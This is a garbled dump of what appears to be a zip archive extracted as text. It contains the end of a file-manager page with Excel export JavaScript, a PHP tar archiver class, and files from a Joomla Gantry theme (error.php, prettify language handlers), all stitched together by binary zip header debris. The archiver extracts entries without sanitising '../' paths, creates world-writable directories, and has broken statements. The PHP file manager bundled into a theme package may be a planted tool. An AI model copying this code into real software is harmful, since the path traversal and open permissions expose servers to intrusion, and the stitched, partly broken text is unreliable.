		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
?>PK!�u����it_sanctum/error.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

// Bootstrap Gantry framework or fail gracefully (inside included file).
$gantry = include __DIR__ . '/includes/gantry.php';

/** @var \Gantry\Framework\Theme $theme */
$theme = $gantry['theme'];

$context = array(
    'errorcode' => isset($this->error) ? $this->error->getCode() : null,
    'error' => isset($this->error) ? $this->error->getMessage() : null,
    'debug' => $app->get('debug_lang', '0') == '1' || $app->get('debug', '0') == '1',
    'backtrace' => $this->debug ? $this->renderBacktrace() : null
);

// Reset used outline configuration.
unset($gantry['configuration']);

// Render the page.
echo $theme
    ->setLayout('_error')
    ->render('error.html.twig', $context);
PK!4���<	<	!it_sanctum/js/prettify/lang-go.jsnu&1i�/**
 * @license
 * Copyright (C) 2010 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for the Go language..
 * <p>
 * Based on the lexical grammar at 
 * http://golang.org/doc/go_spec.html#Lexical_elements
 * <p>
 * Go uses a minimal style for highlighting so the below does not distinguish
 * strings, keywords, literals, etc. by design.
 * From a discussion with the Go designers:
 * <pre>
 * On Thursday, July 22, 2010, Mike Samuel <...> wrote:
 * > On Thu, Jul 22, 2010, Rob 'Commander' Pike <...> wrote:
 * >> Personally, I would vote for the subdued style godoc presents at http://golang.org
 * >>
 * >> Not as fancy as some like, but a case can be made it's the official style.
 * >> If people want more colors, I wouldn't fight too hard, in the interest of
 * >> encouragement through familiarity, but even then I would ask to shy away
 * >> from technicolor starbursts.
 * >
 * > Like http://golang.org/pkg/go/scanner/ where comments are blue and all
 * > other content is black?  I can do that.
 * </pre>
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace is made up of spaces, tabs and newline characters.
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // Not escaped as a string.  See note on minimalism above.
         [PR['PR_PLAIN'],       /^(?:\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)|\'(?:[^\'\\]|\\[\s\S])+(?:\'|$)|`[^`]*(?:`|$))/, null, '"\'']
        ],
        [
         // Block comments are delimited by /* and */.
         // Single-line comments begin with // and extend to the end of a line.
         [PR['PR_COMMENT'],     /^(?:\/\/[^\r\n]*|\/\*[\s\S]*?\*\/)/],
         [PR['PR_PLAIN'],       /^(?:[^\/\"\'`]|\/(?![\/\*]))+/i]
        ]),
    ['go']);
PK!'�����#it_sanctum/js/prettify/lang-rust.jsnu&1i�/**
 * @license
 * Copyright (C) 2015 Chris Morgan
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Rust.
 *
 * Derived from prior experience implementing similar things in a few environments,
 * most especially rust.vim.
 *
 * @author me@chrismorgan.info
 */

PR['registerLangHandler'](
    PR['createSimpleLexer']([], [
		// Whitespace
		[PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/],

		// Single line comments
		[PR['PR_COMMENT'], /^\/\/.*/],
		// Block comments (sadly I do not see how to make this cope with comment nesting as it should)
		[PR['PR_COMMENT'], /^\/\*[\s\S]*?(?:\*\/|$)/],//, null],
		// String and character literals
		[PR['PR_STRING'], /^b"(?:[^\\]|\\(?:.|x[\da-fA-F]{2}))*?"/],  // Bytes literal
		[PR['PR_STRING'], /^"(?:[^\\]|\\(?:.|x[\da-fA-F]{2}|u\{\[\da-fA-F]{1,6}\}))*?"/],  // String literal
		[PR['PR_STRING'], /^b?r(#*)\"[\s\S]*?\"\1/],  // Raw string/bytes literal
		[PR['PR_STRING'], /^b'([^\\]|\\(.|x[\da-fA-F]{2}))'/],  // Byte literal
		[PR['PR_STRING'], /^'([^\\]|\\(.|x[\da-fA-F]{2}|u\{[\da-fA-F]{1,6}\}))'/],  // Character literal

		// Lifetime
		[PR['PR_TAG'], /^'\w+?\b/],

		// Keywords, reserved keywords and primitive types
		[PR['PR_KEYWORD'], /^(?:match|if|else|as|break|box|continue|extern|fn|for|in|if|impl|let|loop|pub|return|super|unsafe|where|while|use|mod|trait|struct|enum|type|move|mut|ref|static|const|crate)\b/],
		[PR['PR_KEYWORD'], /^(?:alignof|become|do|offsetof|priv|pure|sizeof|typeof|unsized|yield|abstract|virtual|final|override|macro)\b/],
		[PR['PR_TYPE'], /^(?:[iu](8|16|32|64|size)|char|bool|f32|f64|str|Self)\b/],

		// Rust 1.0 prelude items
		[PR['PR_TYPE'], /^(?:Copy|Send|Sized|Sync|Drop|Fn|FnMut|FnOnce|Box|ToOwned|Clone|PartialEq|PartialOrd|Eq|Ord|AsRef|AsMut|Into|From|Default|Iterator|Extend|IntoIterator|DoubleEndedIterator|ExactSizeIterator|Option|Some|None|Result|Ok|Err|SliceConcatExt|String|ToString|Vec)\b/],

		// Literals:
		[PR['PR_LITERAL'], /^(self|true|false|null)\b/],
		// A number is a hex integer literal, a decimal real literal, or in
		// scientific notation.
		// Integer literals: decimal, hexadecimal, octal, binary.
		[PR['PR_LITERAL'], /^\d[0-9_]*(?:[iu](?:size|8|16|32|64))?/],
		[PR['PR_LITERAL'], /^0x[a-fA-F0-9_]+(?:[iu](?:size|8|16|32|64))?/],
		[PR['PR_LITERAL'], /^0o[0-7_]+(?:[iu](?:size|8|16|32|64))?/],
		[PR['PR_LITERAL'], /^0b[01_]+(?:[iu](?:size|8|16|32|64))?/],
		// Float literals
		[PR['PR_LITERAL'], /^\d[0-9_]*\.(?![^\s\d.])/],
		[PR['PR_LITERAL'], /^\d[0-9_]*(?:\.\d[0-9_]*)(?:[eE][+-]?[0-9_]+)?(?:f32|f64)?/],
		[PR['PR_LITERAL'], /^\d[0-9_]*(?:\.\d[0-9_]*)?(?:[eE][+-]?[0-9_]+)(?:f32|f64)?/],
		[PR['PR_LITERAL'], /^\d[0-9_]*(?:\.\d[0-9_]*)?(?:[eE][+-]?[0-9_]+)?(?:f32|f64)/],

		// Macro invocations (an identifier plus a !)
		[PR['PR_ATTRIB_NAME'], /^[a-z_]\w*!/i],
		// An identifier (sorry, this should be unicode)
		[PR['PR_PLAIN'], /^[a-z_]\w*/i],
		// Attributes
		[PR['PR_ATTRIB_VALUE'], /^#!?\[[\s\S]*?\]/],
		// All the punctuation
		[PR['PR_PUNCTUATION'], /^[+\-/*=^&|!<>%[\](){}?:.,;]/],
		// Anything else (which is probably illegal, as all the legal stuff should have been covered) can be plain
		[PR['PR_PLAIN'], /./]
		]),
    ['rust']);
PK!�m��%it_sanctum/js/prettify/lang-pascal.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Peter Kofler
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// Contributed by peter dot kofler at code minus cop dot org

/**
 * @fileoverview
 * Registers a language handler for (Turbo) Pascal.
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-pascal">(my Pascal code)</pre>
 *
 * @author peter dot kofler at code minus cop dot org
 */

PR.registerLangHandler(
    PR.createSimpleLexer(
        [ // shortcutStylePatterns
          // 'single-line-string'
          [PR.PR_STRING,        /^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$))/, null, '\''],
          // Whitespace
          [PR.PR_PLAIN,         /^\s+/, null, ' \r\n\t\xA0']
        ],
        [ // fallthroughStylePatterns
          // A cStyleComments comment (* *) or {}
          [PR.PR_COMMENT,       /^\(\*[\s\S]*?(?:\*\)|$)|^\{[\s\S]*?(?:\}|$)/, null],
          [PR.PR_KEYWORD,       /^(?:ABSOLUTE|AND|ARRAY|ASM|ASSEMBLER|BEGIN|CASE|CONST|CONSTRUCTOR|DESTRUCTOR|DIV|DO|DOWNTO|ELSE|END|EXTERNAL|FOR|FORWARD|FUNCTION|GOTO|IF|IMPLEMENTATION|IN|INLINE|INTERFACE|INTERRUPT|LABEL|MOD|NOT|OBJECT|OF|OR|PACKED|PROCEDURE|PROGRAM|RECORD|REPEAT|SET|SHL|SHR|THEN|TO|TYPE|UNIT|UNTIL|USES|VAR|VIRTUAL|WHILE|WITH|XOR)\b/i, null],
          [PR.PR_LITERAL,       /^(?:true|false|self|nil)/i, null],
          [PR.PR_PLAIN,         /^[a-z][a-z0-9]*/i, null],
          // Literals .0, 0, 0.0 0E13
          [PR.PR_LITERAL,       /^(?:\$[a-f0-9]+|(?:\d+(?:\.\d*)?|\.\d+)(?:e[+\-]?\d+)?)/i,  null, '0123456789'],
          [PR.PR_PUNCTUATION,   /^.[^\s\w\.$@\'\/]*/, null]
        ]),
    ['pascal']);
PK!8I�rcrc!it_sanctum/js/prettify/lang-xq.jsnu&1i�/**
 * @license
 * Copyright (C) 2011 Patrick Wied
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */


/**
 * @fileoverview
 * Registers a language handler for XQuery.
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-xq"></pre>
 *
 *
 * @author Patrick Wied ( patpa7p@live.de )
 * @version 2010-09-28
 */

// Falls back to plain for stylesheets that don't style fun.
var PR_FUNCTION = 'fun pln';
// Falls back to plaiin for stylesheets that don't style var.
var PR_VARIABLE = 'var pln';

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Matching $var-ia_bles
         [PR_VARIABLE, /^\$[A-Za-z0-9_\-]+/, null, "$"]
        ],
        [
         // Matching lt and gt operators
         // Not the best matching solution but you have to differentiate between the gt operator and the tag closing char
         [PR['PR_PLAIN'], /^[\s=][<>][\s=]/],
         // Matching @Attributes
         [PR['PR_LITERAL'], /^\@[\w-]+/],
         // Matching xml tags
         [PR['PR_TAG'], /^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i],
         // Matching single or multiline xquery comments -> (: <text> :)
         [PR['PR_COMMENT'], /^\(:[\s\S]*?:\)/],
         // Tokenizing /{}:=;*,[]() as plain
         [PR['PR_PLAIN'], /^[\/\{\};,\[\]\(\)]$/],
         // Matching a double or single quoted, possibly multi-line, string.
         // with the special condition that a { in a string changes to xquery context 
         [PR['PR_STRING'], /^(?:\"(?:[^\"\\\{]|\\[\s\S])*(?:\"|$)|\'(?:[^\'\\\{]|\\[\s\S])*(?:\'|$))/, null, '"\''],
         // Matching standard xquery keywords
         [PR['PR_KEYWORD'], /^(?:xquery|where|version|variable|union|typeswitch|treat|to|then|text|stable|sortby|some|self|schema|satisfies|returns|return|ref|processing-instruction|preceding-sibling|preceding|precedes|parent|only|of|node|namespace|module|let|item|intersect|instance|in|import|if|function|for|follows|following-sibling|following|external|except|every|else|element|descending|descendant-or-self|descendant|define|default|declare|comment|child|cast|case|before|attribute|assert|ascending|as|ancestor-or-self|ancestor|after|eq|order|by|or|and|schema-element|document-node|node|at)\b/],
         // Matching standard xquery types
         [PR['PR_TYPE'], /^(?:xs:yearMonthDuration|xs:unsignedLong|xs:time|xs:string|xs:short|xs:QName|xs:Name|xs:long|xs:integer|xs:int|xs:gYearMonth|xs:gYear|xs:gMonthDay|xs:gDay|xs:float|xs:duration|xs:double|xs:decimal|xs:dayTimeDuration|xs:dateTime|xs:date|xs:byte|xs:boolean|xs:anyURI|xf:yearMonthDuration)\b/, null],
         // Matching standard xquery functions
         [PR_FUNCTION, /^(?:xp:dereference|xinc:node-expand|xinc:link-references|xinc:link-expand|xhtml:restructure|xhtml:clean|xhtml:add-lists|xdmp:zip-manifest|xdmp:zip-get|xdmp:zip-create|xdmp:xquery-version|xdmp:word-convert|xdmp:with-namespaces|xdmp:version|xdmp:value|xdmp:user-roles|xdmp:user-last-login|xdmp:user|xdmp:url-encode|xdmp:url-decode|xdmp:uri-is-file|xdmp:uri-format|xdmp:uri-content-type|xdmp:unquote|xdmp:unpath|xdmp:triggers-database|xdmp:trace|xdmp:to-json|xdmp:tidy|xdmp:subbinary|xdmp:strftime|xdmp:spawn-in|xdmp:spawn|xdmp:sleep|xdmp:shutdown|xdmp:set-session-field|xdmp:set-response-encoding|xdmp:set-response-content-type|xdmp:set-response-code|xdmp:set-request-time-limit|xdmp:set|xdmp:servers|xdmp:server-status|xdmp:server-name|xdmp:server|xdmp:security-database|xdmp:security-assert|xdmp:schema-database|xdmp:save|xdmp:role-roles|xdmp:role|xdmp:rethrow|xdmp:restart|xdmp:request-timestamp|xdmp:request-status|xdmp:request-cancel|xdmp:request|xdmp:redirect-response|xdmp:random|xdmp:quote|xdmp:query-trace|xdmp:query-meters|xdmp:product-edition|xdmp:privilege-roles|xdmp:privilege|xdmp:pretty-print|xdmp:powerpoint-convert|xdmp:platform|xdmp:permission|xdmp:pdf-convert|xdmp:path|xdmp:octal-to-integer|xdmp:node-uri|xdmp:node-replace|xdmp:node-kind|xdmp:node-insert-child|xdmp:node-insert-before|xdmp:node-insert-after|xdmp:node-delete|xdmp: